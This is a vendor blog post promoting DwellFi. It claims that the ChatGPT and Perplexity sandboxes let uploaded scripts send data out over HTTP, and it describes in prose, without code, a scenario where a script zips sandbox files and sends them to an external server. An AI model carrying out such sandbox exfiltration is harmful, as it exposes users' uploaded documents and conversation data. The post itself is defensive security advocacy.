Why your AI Sandbox might be leaking data, and how we built DwellFi differently
Last week, Gareth Wright posted on LinkedIn about a concerning observation: OpenAI's ChatGPT sandbox allows users to upload and execute scripts—and while most outbound internet access is restricted, you can still exfiltrate data over HTTP.
We had to test it ourselves.
Our Test Results
Platform | Script Upload | Script Execution | HTTP Exfiltration |
ChatGPT | Allowed | Allowed | Possible |
Perplexity | Allowed | Allowed | Possible |
DwellFi | Blocked | Blocked | Blocked |
This Isn't Theoretical—There Are Actual CVEs
Some might dismiss this as fear-mongering. The evidence says otherwise:
CVE-2025-59532: OpenAI Codex CLI Vulnerability
OpenAI's Codex CLI had a critical security vulnerability that allowed arbitrary file writes and command execution due to improper sandbox configuration. This wasn't a hypothetical—it was a documented CVE.
Perplexity Comet Browser Security Audit Failures
Security researchers from Brave and Guardio conducted audits of Perplexity's Comet browser and found significant vulnerabilities including susceptibility to phishing scams and malicious code injection.
OpenAI's Own Admission
Reuters reported that OpenAI has acknowledged its upcoming AI models could pose "high" cybersecurity risks, with potential for developing zero-day remote exploits.
"It's Just a Sandbox"—Why That Argument Doesn't Hold
Some commenters on the original post argued this is expected behavior. After all, a sandbox is isolated, right?
Here's the problem with that logic:
What's Actually in That Sandbox?
- Uploaded documents (contracts, financials, client data)
- Custom prompts (proprietary workflows, system instructions)
- Generated outputs (analysis, recommendations, code)
- Session context (conversation history with sensitive details)
When a user uploads a script that zips
/home/oai and sends it to an external endpoint, they're not exfiltrating OpenAI's data—they're exfiltrating yours.For consumer use? Maybe acceptable.
For enterprise financial services? Absolutely not.
The Enterprise AI Security Gap
Most organizations adopting AI are focused on:
- Model accuracy
- Integration capabilities
- Cost per token
- Compliance certifications
What They're NOT Asking:
- Can users execute arbitrary code in our environment?
- What data is accessible during script execution?
- Are there egress controls on sandbox network access?
- How is session data isolated between users and conversations?
This isn't hypothetical. It's a concrete attack vector.
Attack Scenario
An employee uploads a "helpful automation script" they found online. That script:
- Accesses all files in the sandbox
- Packages them with conversation history
- Sends them to an external server
- Returns a benign response
The user sees: "Script executed successfully!"
You see: Nothing. Until the breach report.
How DwellFi Approaches Sandbox Security
When we built DwellFi for financial services, we started with a simple assumption:
Every user is a potential threat vector.
Not because we don't trust people—because that's how you build secure enterprise systems.
Our Architecture
1. No Arbitrary Code Execution
Users cannot upload or execute scripts in environments that touch session data. Period.
2. Egress-Only Allow Lists
Network access from processing environments is restricted to explicitly approved endpoints. No HTTP callbacks to arbitrary domains.
3. Session Isolation
Each conversation exists in a cryptographically isolated context. Even if code execution were possible, cross-session data access is architecturally impossible.
4. Audit Everything
Every file operation, network request, and data access is logged and attributable. Anomalous behavior triggers immediate alerts.
Questions to Ask Your AI Vendor
If you're evaluating AI platforms for enterprise use, add these to your security review:
- Can users execute arbitrary code in the processing environment?
- What data is accessible during code/script execution?
- What egress controls exist on sandbox network access?
- How is session data isolated between users?
- What audit trails exist for data access and network activity?
If the answers are vague—or worse, "we trust our sandbox isolation"—that's a red flag.
AI sandbox security isn't a theoretical concern. It's a concrete vulnerability that exists in production systems used by millions—with documented CVEs to prove it.
For consumer applications, the risk/convenience tradeoff might be acceptable.
For enterprise financial services—where a single data breach can mean regulatory action, client loss, and reputational damage—it's not.
Security isn't a feature you add later. It's architecture you build from day one.
Sources & References
DwellFi is an AI-powered financial technology platform built for enterprise security requirements.